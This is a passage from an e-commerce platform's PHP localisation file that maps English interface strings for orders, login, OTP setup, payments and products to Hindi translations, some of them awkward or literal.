जानकारी', 'General_info' => 'सामान्य जानकारी', 'Generate Sitemap' => 'साइटमैप उत्पन्न करें', 'Generate_Site_Map' => 'साइट मैप उत्पन्न करें', 'Generate_Sitemap' => 'साइटमैप उत्पन्न करें', 'Geothermal Air Conditioner' => 'भूतापीय वायु कंडीशनर', 'Get Started' => 'शुरू हो जाओ', 'Get new password' => 'नया पासवर्ड प्राप्त करें', 'Gil Watkins' => 'गिल वॉटकिंस', 'Go Back' => 'वापस जाओ', 'Go to' => 'जाओ', 'Go to Apple Developer page' => 'Apple डेवलपर पेज पर जाएं', 'Go to the Credentials page' => 'क्रेडेंशियल्स पेज पर जाएं', 'Go to the facebook developer page' => 'फेसबुक डेवलपर पेज पर जाएं', 'Go to the facebook developer page and' => 'फेसबुक डेवलपर पेज पर जाएं और', 'Go to your order' => 'अपने आदेश पर जाएं', 'Go_Back' => 'वापस जाओ', 'Go_To_Chatbox' => 'चैटबॉक्स पर जाएं', 'Go_back' => 'वापस जाओ', 'Go_to_the_Credentials_page' => 'क्रेडेंशियल्स पेज पर जाएं', 'Good' => 'अच्छा', 'Google API Set up Instructions' => 'Google API ने निर्देश दिए', 'Google plus' => 'Google Plus', 'Google_Map_APIs' => 'Google मानचित्र API', 'Google_Recapcha_Information' => 'Google recapcha जानकारी', 'Got It' => 'समझ गया', 'Got_It' => 'समझ गया', 'Great Hall' => 'बड़ा हॉल', 'Grid_View' => 'जालक दृश्य', 'HI' => 'HI', 'HMAC' => 'एचएमएसी', 'HOME' => 'घर', 'Happy_Club' => 'हैप्पी क्लब', 'Hard disk' => 'हार्ड डिस्क', 'Have_an_Account' => 'एक खाता है', 'Head Office' => 'प्रधान कार्यालय', 'Header Banner' => 'हेडर बैनर', 'Headphones' => 'हेडफोन', 'Hello' => 'नमस्ते', 'Hello Store' => 'हैलो स्टोर', 'Help & Support' => 'मदद समर्थन', 'Help_&_Support' => 'मदद समर्थन', 'Help_&_Support_Section' => 'सहायता और समर्थन अनुभाग', 'Here in top left corner you can see the' => 'यहाँ शीर्ष बाएं कोने में आप देख सकते हैं', 'High' => 'उच्च', 'High_to_Low' => 'उच्चे से नीचा', 'High_to_Low_Price' => 'उच्च मूल्य', 'Holder Name' => 'धारक का नाम', 'Holder_Name' => 'धारक का नाम', 'Home' => 'घर', 'Home Pet & Appliances' => 'घर पालतू जानवर और उपकरण', 'Home Improvement & Tools' => 'गृह सुधार और उपकरण', 'Home_(Shipping_Address)' => 'घर (शिपिंग पता)', 'Host' => 'मेज़बान', 'Hot Selling Sneakers Sneakers Men Casual Shoes Men Fashion Sneakers Fly knit Li' => 'हॉट सेलिंग स्नीकर्स स्नीकर्स मेन कैजुअल शूज़ मेन फैशन स्नीकर्स फ्लाई निट ली', 'Hotline' => 'हॉटलाइन', 'How_the_Setting_Works' => 'सेटिंग कैसे काम करती है', 'How_to_use' => 'का उपयोग कैसे करें', 'Hurry_up' => 'जल्दी करो', 'ID' => 'पहचान', 'I_agree_with_the' => 'मैं सहमत हूं', 'Id' => 'पहचान', 'If GST number is disabled here it will not show in invoice' => 'यदि GST नंबर यहां अक्षम है, तो यह चालान में नहीं दिखाएगा', 'If GST number is disabled here it will not show in invoice' => 'यदि GST नंबर यहां अक्षम है, तो यह चालान में नहीं दिखाएगा', 'If needed' => 'यदि ज़रूरत हो तो', 'If sales commission is disabled here the system default commission will be applied' => 'यदि बिक्री आयोग यहां अक्षम है, तो सिस्टम डिफ़ॉल्ट आयोग लागू किया जाएगा', 'If sales commission is disabled here the system default commission will be applied' => 'यदि बिक्री आयोग यहां अक्षम है, तो सिस्टम डिफ़ॉल्ट आयोग लागू किया जाएगा', 'If the user fails to get the OTP within a certain time user can request a resend' => 'यदि उपयोगकर्ता एक निश्चित समय के भीतर OTP प्राप्त करने में विफल रहता है तो उपयोगकर्ता एक RESEND का अनुरोध कर सकता है', 'If you need help or you have any other questions feel free to email us' => 'यदि आपको सहायता की आवश्यकता है या आपके पास कोई अन्य प्रश्न हैं जो हमें ईमेल करने के लिए स्वतंत्र महसूस करते हैं', 'If you need help or you have any other questions feel free to email us' => 'यदि आपको सहायता की आवश्यकता है या आपके पास कोई अन्य प्रश्न हैं जो हमें ईमेल करने के लिए स्वतंत्र महसूस करते हैं', 'If_disabled_admin_can_deliver_orders_only_within_his_country' => 'यदि विकलांग व्यवस्थापक केवल अपने देश के भीतर ऑर्डर दे सकते हैं', 'If_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'यदि विकलांग विक्रेता अपनी दुकानों में डिजिटल उत्पाद नहीं बेच सकते हैं', 'If_enabled_admin_can_deliver_orders_beyond_his_country' => 'यदि सक्षम व्यवस्थापक अपने देश से परे आदेश दे सकता है', 'If_enabled_sellers_can_sell_digital_products_in_their_shops' => 'यदि सक्षम विक्रेता अपनी दुकानों में डिजिटल उत्पाद बेच सकते हैं', 'If_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site _you' => 'यदि आपको कोई सहायता की आवश्यकता है या हमारी साइट के बारे में प्रतिक्रिया या सुझाव है', 'Image' => 'छवि', 'Image ratio should be' => 'छवि अनुपात होना चाहिए', 'Image ratio should be 1=>1' => 'छवि अनुपात 1=> 1 होना चाहिए', 'Image uploaded successfully' => 'छवि सफलतापूर्वक अपलोड की गई', 'Image_Ratio' => 'छवि अनुपात', 'Image_Ration' => 'छवि राशन', 'Image_Ration_1=>1' => 'छवि राशन 1=> 1', 'Image_format_-_jpg _jpeg _png' => 'छवि प्रारूप - JPG JPEG PNG', 'Image_ratio_should_be' => 'छवि अनुपात होना चाहिए', 'Image_size_must_be_within' => 'छवि का आकार भीतर होना चाहिए', 'Image_type_must_be_within' => 'छवि प्रकार के भीतर होना चाहिए', 'Import Products File' => 'आयात उत्पाद फ़ाइल', 'In about section select' => 'खंड का चयन करें', 'In-Active' => 'इन-सक्रिय', 'In-House' => 'में-घर', 'In-House Earning' => 'घर की कमाई', 'In-House Orders' => 'हाउस ऑर्डर', 'In-House Product Discount' => 'इन-हाउस उत्पाद छूट', 'In-House Products' => 'इन-हाउस उत्पाद', 'In-House_Order' => 'हाउस ऑर्डर', 'In-House_Product_List' => 'इन-हाउस उत्पाद सूची', 'In-House_Shop' => 'घर की दुकान', 'In-House_Store_Banner' => 'इन-हाउस स्टोर बैनर', 'In-House_earning' => 'घर की कमाई', 'In-Stock' => 'स्टॉक में', 'In-house' => 'में-घर', 'InHouse Products' => 'इनहाउस प्रोडक्ट्स', 'InHouse product sale report' => 'इनहाउस उत्पाद बिक्री रिपोर्ट', 'In_Compare' => 'तुलना में', 'In_House' => 'घर में', 'In_Stock' => 'स्टॉक में', 'Inactive' => 'निष्क्रिय', 'Inactive_Products' => 'निष्क्रिय उत्पाद', 'Inbox' => 'इनबॉक्स', 'Incomplete bank info' => 'अपूर्ण बैंक जानकारी', 'Infinity' => 'अनंत', 'Info' => 'जानकारी', 'Info inquiry' => 'जानकारी जांच', 'Info updated successfully!' => 'जानकारी सफलतापूर्वक अपडेट की गई!', 'Info_inquiry' => 'जानकारी जांच', 'Informations' => 'जानकारी', 'Inhouse product sale Report' => 'इनहाउस उत्पाद बिक्री रिपोर्ट', 'Input Field Type' => 'इनपुट फ़ील्ड प्रकार', 'Instagram' => 'Instagram', 'Instruction will be available very soon' => 'निर्देश बहुत जल्द उपलब्ध होगा', 'Instructions' => 'निर्देश', 'Internet Cable' => 'इंटरनेट केबल', 'Invalid Order Id or Phone Number' => 'अमान्य आदेश आईडी या फोन नंबर', 'Invalid Phone Number' => 'अवैध फोन नंबर', 'Invalid credential or account no verified yet' => 'अमान्य क्रेडेंशियल या खाता अभी तक सत्यापित नहीं है', 'Invalid credential or account suspended' => 'अमान्य क्रेडेंशियल या खाता निलंबित', 'Invalid date range' => 'अमान्य दिनांक सीमा', 'Invalid review!' => 'अमान्य समीक्षा!', 'Invalid withdraw request' => 'अमान्य वापसी अनुरोध', 'Invoice' => 'चालान', 'Is Required' => 'आवश्यक है', 'Item' => 'वस्तु', 'Item Details' => 'आइटम विवरण', 'Item has been added in your cart!' => 'आइटम आपकी गाड़ी में जोड़ा गया है!', 'Item has been removed from cart' => 'आइटम को गाड़ी से हटा दिया गया है', 'Item has been removed from cart ' => 'आइटम को गाड़ी से हटा दिया गया है', 'Item_Details' => 'आइटम विवरण', 'Item_Price' => 'आइटम की कीमत', 'Item_has_been_removed_from_cart' => 'आइटम को गाड़ी से हटा दिया गया है', 'Item_has_been_removed_from_cart ' => 'आइटम को गाड़ी से हटा दिया गया है', 'Items' => 'सामान', 'Items Ordered' => 'आइटम का आर्डर दिया है', 'Items Price' => 'वस्तुओं की कीमत', 'Jewelry' => 'जेवर', 'Jewelry & Watches' => 'गहने और घड़ियाँ', 'Jhon' => 'जॉन', 'Joined' => 'में शामिल हो गए', 'Joined At' => 'में शामिल हो गया', 'Just_reorder_from_your_previous_orders' => 'बस अपने पिछले आदेशों से पुन=> व्यवस्थित करें', 'Just_reorder_from_your_previous_orders.' => 'बस अपने पिछले आदेशों से पुन=> व्यवस्थित करें।', 'KR Fashion' => 'केआर फैशन', 'Kevin Barr' => 'केविन बर्र', 'Key' => 'चाबी', 'Key removed successfully' => 'कुंजी को सफलतापूर्वक हटा दिया गया', 'Key translated successfully' => 'कुंजी का सफलतापूर्वक अनुवाद किया गया', 'Keyboard & Mouse' => 'कीबोर्ड और माउस', 'Kids Wood Table and 4 Chair Set Natural Table Assorted Color Chairs' => 'बच्चों की लकड़ी की मेज और 4 कुर्सी सेट प्राकृतिक टेबल मिश्रित रंग कुर्सियाँ', 'LTR' => 'एल टीआर', 'LUX' => 'लूक्रस', 'Ladies Bag' => 'लेडीज बैग', 'Ladies Watch' => 'लेडीज वॉच', 'Ladies Winter Long Sleeve Sweater' => 'लेडीज विंटर लॉन्ग स्लीव स्वेटर', 'Language' => 'भाषा', 'Language Translate' => 'भाषा अनुवाद', 'Languages' => 'बोली', 'Laptop Tabs & Notebooks' => 'लैपटॉप टैब और नोटबुक', 'Laptop cooler' => 'लैपटॉप कूलर', 'Last' => 'अंतिम', 'Last Name' => 'उपनाम', 'Last Updated' => 'आखरी अपडेट', 'Last Updated Stock' => 'अंतिम अद्यतन स्टॉक', 'Last name is required!' => 'अंतिम नाम आवश्यक है!', 'Last_Name' => 'उपनाम', 'Latest' => 'नवीनतम', 'Latest_Product' => 'नवीनतम उत्पाद', 'Latest_Products' => 'नवीनतम उत्पाद', 'Leave a Message' => 'एक संदेश छोड़ें', 'Leave_a_comment' => 'एक टिप्पणी छोड़ें', 'Leave_your_issue' => 'अपने मुद्दे को छोड़ दो', 'Left' => 'बाएं', 'Let_us_Shopping_Today' => 'आज हम खरीदारी करते हैं', 'Letâs_Shopping_Today' => 'आज की खरीदारी करें', 'Limit' => 'आप LIMIT', 'Limited Sotcks' => 'सीमित sotcks', 'Limited_Stocked_Products_List' => 'सीमित स्टॉक किए गए उत्पाद सूची', 'Limited_Stocks' => 'सीमित स्टॉक', 'LinkedIn' => 'Linkedin', 'List' => 'सूची', 'List_View' => 'लिस्ट व्यू', 'Live' => 'रहना', 'Live_Chat' => 'सीधी बातचीत', 'Loading Gif' => 'लोडिंग जिफ', 'Log in into your Facebook account (if youâre not)' => 'अपने फेसबुक अकाउंट में लॉग इन करें (यदि आप नहीं हैं)', 'Login' => 'लॉग इन करें', 'Login Turned OFF ' => 'लॉगिन बंद कर दिया', 'Login Turned ON ' => 'लॉगिन चालू', 'Login is now disabled. Customers will not be able to sign up or log in using their social media accounts. Please note that this may affect user experience and registration/login process.' => 'लॉगिन अब अक्षम है। ग्राहक अपने सोशल मीडिया खातों का उपयोग करके साइन अप या लॉग इन नहीं कर पाएंगे। कृपया ध्यान दें कि यह उपयोगकर्ता अनुभव और पंजीकरण/लॉगिन प्रक्रिया को प्रभावित कर सकता है।', 'Login is now enabled. Customers will be able to sign up or log in using their social media accounts.' => 'लॉगिन अब सक्षम है। ग्राहक अपने सोशल मीडिया खातों का उपयोग करके साइन अप या लॉग इन कर सकेंगे।', 'Login_Now' => 'अभी लॉगिन करें', 'Login_successful' => 'लॉग इन सफल', 'Logout' => 'लॉग आउट', 'London Beauty Soap Bar' => 'लंदन ब्यूटी सोप बार', 'Low' => 'कम', 'Low_to_High' => 'नीचे से उच्चा', 'Low_to_High_Price' => 'उच्च कीमत से कम', 'Loyalty Point' => 'वफादारी बिंदु', 'Loyalty_Point' => 'वफादारी बिंदु', 'Loyalty_Points' => 'वफादारी अंक', 'Mail Config' => 'डाक विन्यास', 'Mail_Body' => 'डाक -निकाय', 'Mail_Config' => 'डाक विन्यास', 'Main Banner' => 'मुख्य बैनर', 'Main Section Banner' => 'मुख्य धारा बैनर', 'Main_Banner' => 'मुख्य बैनर', 'Main_Banner_updated_Successfully' => 'मुख्य बैनर सफलतापूर्वक अपडेट किया गया', 'Maintenance Mode on' => 'रखरखाव मोड पर', 'Maintenance_Mode' => 'रखरखाव मोड', 'Make sure to check' => 'जांच करना सुनिश्चित करें', 'Man Watch' => 'आदमी घड़ी', 'Manage_Deliveries' => 'डिलीवरी का प्रबंधन करें', 'Marketing_Section' => 'विपणन अनुभाग', 'Mart Morning' => 'मार्ट सुबह', 'Max' => 'अधिकतम', 'Mechanical' => 'यांत्रिक', 'Medium' => 'मध्यम', 'Men s fashion' => 'पुरुषों का पहनावा', 'Menu' => 'मेन्यू', 'Merchant' => 'व्यापारी', 'Message' => 'संदेश', 'Message_Log' => 'संदेश लॉग', 'Message_View' => 'संदेश दृश्य', 'Message_updated' => 'संदेश अपडेट किया गया', 'Messages' => 'संदेशों', 'Meta Description' => 'मेटा विवरण', 'Meta Image' => 'मेटा छवि', 'Meta Title' => 'मेटा शीर्षक', 'Meta_Description' => 'मेटा विवरण', 'Meta_Image' => 'मेटा छवि', 'Meta_Title' => 'मेटा शीर्षक', 'Meta_description' => 'मेटा विवरण', 'Meta_image' => 'मेटा छवि', 'Meta_title' => 'मेटा शीर्षक', 'Method' => 'तरीका', 'Method_name' => 'विधि नाम', 'Microphones' => 'माइक्रोफोन', 'Microwaves' => 'माइक्रोवेव', 'Min' => 'मिन', 'Minimum' => 'न्यूनतम', 'Minimum_' => 'न्यूनतम', 'Minimum_200_Points_required_to_convert_Into_currency' => 'मुद्रा में परिवर्तित करने के लिए न्यूनतम 200 अंक आवश्यक हैं', 'Minimum_200_points_required_to_convert' => 'परिवर्तित करने के लिए आवश्यक न्यूनतम 200 अंक', 'Mobile' => 'गतिमान', 'Mobile Accessories' => 'मोबाइल से जुड़े सामान', 'Modentum' => 'एक मॉडरेशन में', 'More From The Store' => 'स्टोर से अधिक', 'More_Brands' => 'अधिक ब्रांड', 'More_Categories' => 'अधिक श्रेणियां', 'More_from_the_Store' => 'स्टोर से अधिक', 'Morning Mart' => 'सुबह का मार्ट', 'Most_Demanded_Product' => 'सबसे अधिक मांग वाला उत्पाद', 'Most_Favorite' => 'सबसे पसंदीदा', 'Most_Loved' => 'सबसे ज्यादा प्यारे', 'Most_Popular_Stores' => 'सबसे लोकप्रिय स्टोर', 'Most_Searching' => 'सबसे खोज', 'Most_Visited_Categories' => 'सबसे अधिक देखी जाने वाली श्रेणियां', 'Multi-currency is depends on exchange rate and your gateway configuration So if you don t need multi-currency it will be better select single currency. (We prefer to use single currency).' => 'बहु-मुद्रा विनिमय दर और आपके गेटवे कॉन्फ़िगरेशन पर निर्भर करती है, इसलिए यदि आपको बहु-मुद्रा की आवश्यकता नहीं है, तो यह बेहतर एकल मुद्रा का चयन करेगा। (हम एकल मुद्रा का उपयोग करना पसंद करते हैं)।', 'My Address' => 'मेरा पता', 'My Loyalty Point' => 'मेरी वफादारी बिंदु', 'My Order' => 'मेरे आदेश', 'My Order List' => 'मेरी आदेश सूची', 'My Shopping Cart' => 'मेरी शॉपिंग कार्ट', 'My Support Tickets' => 'मेरे समर्थन टिकट', 'My Wallet' => 'मेरा बटुआ', 'My Wishlists' => 'मेरी विशलिस्ट', 'My profile' => 'मेरी प्रोफाइल', 'My_Address' => 'मेरा पता', 'My_Addresses' => 'मेरे पते', 'My_Bank_Info' => 'मेरी बैंक जानकारी', 'My_Compare_List' => 'मेरी तुलना सूची', 'My_Compare_list' => 'मेरी तुलना सूची', 'My_Inbox' => 'मेरा इनबॉक्स', 'My_Loyalty_Point' => 'मेरी वफादारी बिंदु', 'My_Order' => 'मेरे आदेश', 'My_Order_Details' => 'मेरा आदेश विवरण', 'My_Order_Details_Delivery_Man_Info' => 'मेरे आदेश का विवरण वितरण आदमी जानकारी', 'My_Order_Details_Seller_Info' => 'मेरे आदेश का विवरण विक्रेता जानकारी', 'My_Order_Details_Track_Order' => 'मेरा ऑर्डर विवरण ट्रैक ऑर्डर', 'My_Order_List' => 'मेरी आदेश सूची', 'My_Profile' => 'मेरी प्रोफाइल', 'My_Shop' => 'मेरी दुकान', 'My_Shopping_Cart' => 'मेरी शॉपिंग कार्ट', 'My_Support_Tickets' => 'मेरे समर्थन टिकट', 'My_Wallet' => 'मेरा बटुआ', 'My_Wish_List' => 'मेरी इच्छा सूची', 'My_Wishlist' => 'मेरी इच्छा सूची', 'My_Wishlists' => 'मेरी विशलिस्ट', 'My_profile' => 'मेरी प्रोफाइल', 'N/a' => 'एन/ए', 'N=>B you_can_upload_only' => 'N=> B आप केवल अपलोड कर सकते हैं', 'N=>B you_can_upload_only_6Valleyâs_theme_templates' => 'N=> B आप केवल 6valley\'s थीम टेम्प्लेट अपलोड कर सकते हैं', 'NB' => 'नायब', 'NB => Keep an OTP variable in your SMS providers OTP Template' => 'NB=> अपने SMS प्रदाताओं OTP टेम्पलेट में एक OTP चर रखें', 'NB => XXXX will be replace with otp' => 'NB=> XXXX को OTP से बदल दिया जाएगा', 'NB=>_Image_size_must_be_within_2_MB' => 'एनबी=> छवि का आकार 2 एमबी के भीतर होना चाहिए', 'NB_=>_#OTP#_will_be_replace_with_otp' => 'NB=> # OTP # को OTP के साथ बदल दिया जाएगा', 'NB_=>_Keep_an_OTP_variable_in_your_SMS_providers_OTP_Template' => 'NB=> अपने SMS प्रदाताओं OTP टेम्पलेट में एक OTP चर रखें', 'NB_=>_XXXX_will_be_replace_with_otp' => 'NB=> XXXX को OTP से बदल दिया जाएगा', 'NEWS LETTER' => 'समाचार पत्र', 'Name' => 'नाम', 'Name your OAuth 2.0 client' => 'अपने Oauth 2.0 क्लाइंट का नाम बताइए', 'Nav menu' => 'Nav menu', 'Negative' => 'नकारात्मक', 'Network Components' => 'नेटवर्क घटक', 'Neutral' => 'तटस्थ', 'New' => 'नया', 'New Arrivals' => 'नवागन्तुक', 'New Currency inserted successfully!' => 'नई मुद्रा सफलतापूर्वक डाली गई!', 'New Digital Product' => 'नया डिजिटल उत्पाद', 'New Product' => 'नए उत्पाद', 'New Request' => 'नई विनती', 'New delivery-man' => 'नई डिलीवरी-आदमी', 'New notification' => 'नई अधिसूचना', 'New order ID for you' => 'आपके लिए नया ऑर्डर आईडी', 'New order received' => 'नया आदेश प्राप्त हुआ', 'New_Arrivals' => 'नवागन्तुक', 'New_Seller' => 'नया विक्रेता', 'New_Sub_Sub_Category' => 'नई उप उप श्रेणी', 'Newsletter' => 'समाचार पत्रिका', 'Next' => 'अगला', 'No' => 'नहीं', 'No Account' => 'खाता नहीं', 'No Data found' => 'डाटा प्राप्त नहीं हुआ', 'No Message available' => 'कोई संदेश उपलब्ध नहीं है', 'No Product Found' => 'कोई उत्पाद नहीं मिला', 'No conversation found' => 'कोई बातचीत नहीं मिली', 'No conversetion found' => 'कोई वार्तालाप नहीं मिला', 'No data found' => 'डाटा प्राप्त नहीं हुआ', 'No data to show' => 'दिखाने के लिए कोई डेटा नहीं', 'No such data found!' => 'ऐसा कोई डेटा नहीं मिला!', 'No_Discount' => 'कोई छूट नहीं', 'No_Featured_Product_Found' => 'कोई विशेष उत्पाद नहीं मिला', 'No_Order_Found' => 'कोई आदेश नहीं मिला', 'No_Product_Found' => 'कोई उत्पाद नहीं मिला', 'No_country_to_deliver' => 'कोई देश देने के लिए नहीं', 'No_data_to_found' => 'कोई डेटा नहीं मिला', 'No_data_to_show' => 'दिखाने के लिए कोई डेटा नहीं', 'No_featured_product_found' => 'कोई विशेष उत्पाद नहीं मिला', 'No_reply' => 'कोई जवाब नहीं', 'Not_Seen_Yet' => 'अभी तक नहीं देखा गया', 'Note' => 'टिप्पणी', 'Note about transaction or request' => 'लेनदेन या अनुरोध के बारे में ध्यान दें', 'Notification' => 'अधिसूचना', 'Notification Update' => 'अधिसूचना अद्यतन', 'Notification mail for new order received' => 'नए आदेश के लिए सूचना मेल', 'Notification mail for order placed' => 'आदेश के लिए अधिसूचना मेल', 'Notification_Table' => 'अधिसूचना तालिका', 'Now' => 'अब', 'Now copy' => 'अब कॉपी', 'Now your multi vendor business mode is opening you can add new seller !!' => 'अब आपका मल्टी विक्रेता बिजनेस मोड खोल रहा है आप नए विक्रेता को जोड़ सकते हैं !!', 'Now copy' => 'अब कॉपी', 'Now go to' => 'अब जाओ', 'Now your multi vendor business mode is opening you can add new seller !!' => 'अब आपका मल्टी विक्रेता बिजनेस मोड खोल रहा है आप नए विक्रेता को जोड़ सकते हैं !!', 'Now_you_can_login' => 'अब आप लॉगिन कर सकते हैं', 'Number' => 'संख्या', 'OAuth client ID' => 'Oauth ग्राहक आईडी', 'OAuth_client_ID' => 'Oauth ग्राहक आईडी', 'OFF' => 'बंद', 'OK' => 'ठीक है', 'ON' => 'पर', 'OTP' => 'ओटीपी', 'OTP resend time' => 'OTP रेसेंड टाइम', 'OTP_&_Login' => 'ओटीपी और लॉगिन', 'OTP_Verification' => 'ओटीपी सत्यापन', 'OTP_and_Login_Setup' => 'ओटीपी और लॉगिन सेटअप', 'OTP_and_login_setup' => 'ओटीपी और लॉगिन सेटअप', 'OTP_has_been_sent_again.' => 'ओटीपी को फिर से भेजा गया है।', 'OTP_setup' => 'ओटीपी सेटअप', 'OTP_verification' => 'ओटीपी सत्यापन', 'OVERVIEW' => 'अवलोकन', 'Oder_Transaction_Statement' => 'ओडर लेन -देन विवरण', 'Promotion' => 'ऑफर', 'Offers_&_Deals' => 'प्रस्ताव और सौदे', 'Office' => 'कार्यालय', 'Offline_Payments' => 'ऑफ़लाइन अदायगी', 'Ofline_Payment_Methods' => 'अदायगी के तरीके', 'Ok let me check' => 'ठीक है मुझे जाँच करने दो', 'Ok let me check' => 'ठीक है मुझे जाँच करने दो', 'Old' => 'पुराना', 'Olga Sheppard' => 'ओल्गा शेपर्ड', 'OnGoing' => 'चल रहे', 'On_Vacation' => 'छुट्टी पर', 'Once deleted you will not be able to recover this' => 'एक बार हटाए जाने के बाद आप इसे ठीक नहीं कर पाएंगे', 'Once deleted you will not be able to recover this' => 'एक बार हटाए जाने के बाद आप इसे ठीक नहीं कर पाएंगे', 'Once you have downloaded and filled the format file' => 'एक बार जब आप डाउनलोड कर लेते हैं और प्रारूप फ़ाइल भरते हैं', 'Once you have downloaded and filled the format file upload it in the form below and submit' => 'एक बार जब आप डाउनलोड कर लेते हैं और प्रारूप फ़ाइल को भरे जाते हैं तो इसे नीचे दिए गए फॉर्म में अपलोड करें और सबमिट करें', 'Once you have downloaded and filled the format file upload it in the form below and submit' => 'एक बार जब आप डाउनलोड कर लेते हैं और प्रारूप फ़ाइल को भरे जाते हैं तो इसे नीचे दिए गए फॉर्म में अपलोड करें और सबमिट करें', 'Once_you_convert_the_point_into_money_then_it_won`t_back_to_point' => 'एक बार जब आप बिंदु को पैसे में परिवर्तित कर लेते हैं तो यह वापस इंगित करने के लिए जीत जाता है', 'One Referrer Equal To How Much USD' => 'एक रेफ़रर जो कि USD के बराबर है', 'Ongoing_Orders' => 'चल रहे आदेश', 'Online Shop' => 'ऑनलाइन दुकान', 'Online Shopping' => 'ऑनलाइन खरीदारी', 'Online_Shopping' => 'ऑनलाइन खरीदारी', 'Open' => 'खुला', 'Open Your Store' => 'अपना स्टोर खोलें', 'Open_Your_Store' => 'अपना स्टोर खोलें', 'Open_your_and_start_selling.' => 'अपना खोलें और बेचना शुरू करें।', 'Optional' => 'वैकल्पिक', 'Order' => 'आदेश', 'Order Complete' => 'आर्डर पूरा', 'Order Confirmation Message' => 'आदेश पुष्टिकरण संदेश', 'Order Delivered Message' => 'आदेश दिया गया संदेश', 'Order Details' => 'ऑर्डर का विवरण', 'Order Failed Message' => 'आदेश विफल संदेश', 'Order ID' => 'आदेश कामतत्व', 'Order List' => 'आदेश सूची', 'Order No' => 'आदेश संख्या', 'Order Pending Message' => 'आदेश लंबित संदेश', 'Order Placed' => 'आदेश रखा', 'Order Processing Message' => 'आदेश प्रसंस्करण संदेश', 'Order Report' => 'आदेश रिपोर्ट', 'Order Returned Message' => 'आदेश वापस संदेश', 'Order Shipped' => 'ऑर्डर भेज दिया', 'Order Statistics' => 'आदेश आँकड़े', 'Order Status' => 'आदेश की स्थिति', 'Order Table' => 'आदेश तालिका', 'Order Wise Shipping Method deleted successfully' => 'आदेश बुद्धिमान शिपिंग विधि सफलतापूर्वक हटा दी गई', 'Order details' => 'ऑर्डर का विवरण', 'Order is already delivered You can not change it' => 'ऑर्डर पहले से ही वितरित है आप इसे नहीं बदल सकते हैं', 'Order is already delivered You can not change it !!' => 'आदेश पहले से ही दिया गया है आप इसे नहीं बदल सकते हैं !!', 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation' => 'आदेश पहले से ही वितरित किया गया है और लेनदेन राशि को बदल दिया गया है बदलती स्थिति मिसकैरेज का कारण हो सकती है', 'Order is already delivered You can not change it' => 'ऑर्डर पहले से ही वितरित है आप इसे नहीं बदल सकते हैं', 'Order is already delivered You can not change it !!' => 'आदेश पहले से ही दिया गया है आप इसे नहीं बदल सकते हैं !!', 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation' => 'आदेश पहले से ही वितरित किया गया है और लेनदेन राशि को बदल दिया गया है बदलती स्थिति मिसकैरेज का कारण हो सकती है', 'Order out for delivery Message' => 'वितरण संदेश के लिए आदेश दें', 'Order placed' => 'आदेश रखा', 'Order#' => 'आदेश देना#', 'Order_&_Shipping_Info' => 'आदेश और शिपिंग जानकारी', 'Order_&_Shipping_Info ' => 'आदेश और शिपिंग जानकारी', 'Order_Again' => 'फिर से आदेश देना', 'Order_Amount' => 'ऑर्डर करने की राशि', 'Order_Complete' => 'आर्डर पूरा', 'Order_Created_At' => 'पर बनाया गया आदेश', 'Order_Date' => 'आर्डर की तारीख', 'Order_Delivered' => 'आदेश दिया गया', 'Order_Details' => 'ऑर्डर का विवरण', 'Order_ID' => 'आदेश कामतत्व', 'Order_Invoice' => 'आदेश चालान', 'Order_Management' => 'प्रबंधन को आदेश दें', 'Order_Placed' => 'आदेश रखा', 'Order_Received_Notify_Seller' => 'आदेश प्राप्तकर्ता विक्रेता को प्राप्त किया', 'Order_Report' => 'आदेश रिपोर्ट', 'Order_Settings' => 'आदेश सेटिंग्स', 'Order_Statistics' => 'आदेश आँकड़े', 'Order_Status' => 'आदेश की स्थिति', 'Order_Summary' => 'आदेश सारांश', 'Order_Transactions' => 'आदेश लेनदेन', 'Order_Wise_Shipping_Method_deleted_successfully' => 'आदेश बुद्धिमान शिपिंग विधि सफलतापूर्वक हटा दी गई', 'Order_cancelation_availablity' => 'आदेश रद्द करने योग्यता', 'Order_delivered' => 'आदेश दिया गया', 'Order_details_id' => 'आदेश विवरण आईडी', 'Order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'आदेश पहले से ही वितरित किया गया है और लेनदेन राशि को बदल दिया गया है बदलती स्थिति मिसकैरेज का कारण हो सकती है', 'Order_is_on_the_way' => 'आदेश रास्ते में है', 'Order_list' => 'आदेश सूची', 'Order_placed' => 'आदेश रखा', 'Ordered_Items' => 'ऑर्डर किए गए आइटम', 'Orders' => 'आदेश', 'Orders Served' => 'आदेश दिया', 'Other' => 'अन्य', 'Other s_Store' => 'अन्य एस स्टोर', 'Others' => 'अन्य', 'Others_Store' => 'अन्य स्टोर', 'Out_For_Delivery' => 'डिलीवरी के लिए निकले हैं', 'Out_Of_Stock' => 'स्टॉक ख़त्म', 'Out_of_Stock' => 'स्टॉक ख़त्म', 'Out_of_Stock_Products' => 'स्टॉक उत्पादों से बाहर', 'Out_of_stock' => 'स्टॉक ख़त्म', 'Outdoor Fun & Sports' => 'आउटडोर मज़ा और खेल', 'Overall' => 'कुल मिलाकर', 'Overall Statistics' => 'समग्र आँकड़े', 'Overall_statistics' => 'समग्र आँकड़े', 'Overview' => 'अवलोकन', 'PAYMENT_METHOD' => 'भुगतान विधि', 'PAYMENT_METHODS' => 'भुगतान की विधि', 'POS' => 'पीओ', 'POS Order List' => 'पॉस ऑर्डर सूची', 'POS_Orders' => 'पॉस ऑर्डर', 'POS_order' => 'पॉस ऑर्डर', 'PURCHASE_CODE' => 'खरीद कोड', 'Packaging' => 'पैकेजिंग', 'Packaging order' => 'पैकेजिंग आदेश', 'Packaging_order' => 'पैकेजिंग आदेश', 'Page Not found' => 'पृष्ठ नहीं मिला', 'Pages_&_Media' => 'पेज और मीडिया', 'Paid' => 'चुकाया गया', 'Paid By' => 'द्वारा भुगतान', 'Paid Phone Number' => 'सशुल्क फ़ोन नंबर', 'Paid_by' => 'द्वारा भुगतान', 'Partner request' => 'भागीदार अनुरोध', 'Password' => 'पासवर्ड', 'Password Reset' => 'पासवर्ड रीसेट', 'Password doesn t Match' => 'पासवर्ड टी मैच नहीं', 'Password_Reset_Mail' => 'पासवर्ड रीसेट मेल', 'Password_doesn t_Match' => 'पासवर्ड टी मैच नहीं', 'Passwords do not match' => 'सांकेतिक शब्द मेल नहीं खाते', 'Passwords match' => 'पासवर्ड का मेल', 'Passwords_do_not_match' => 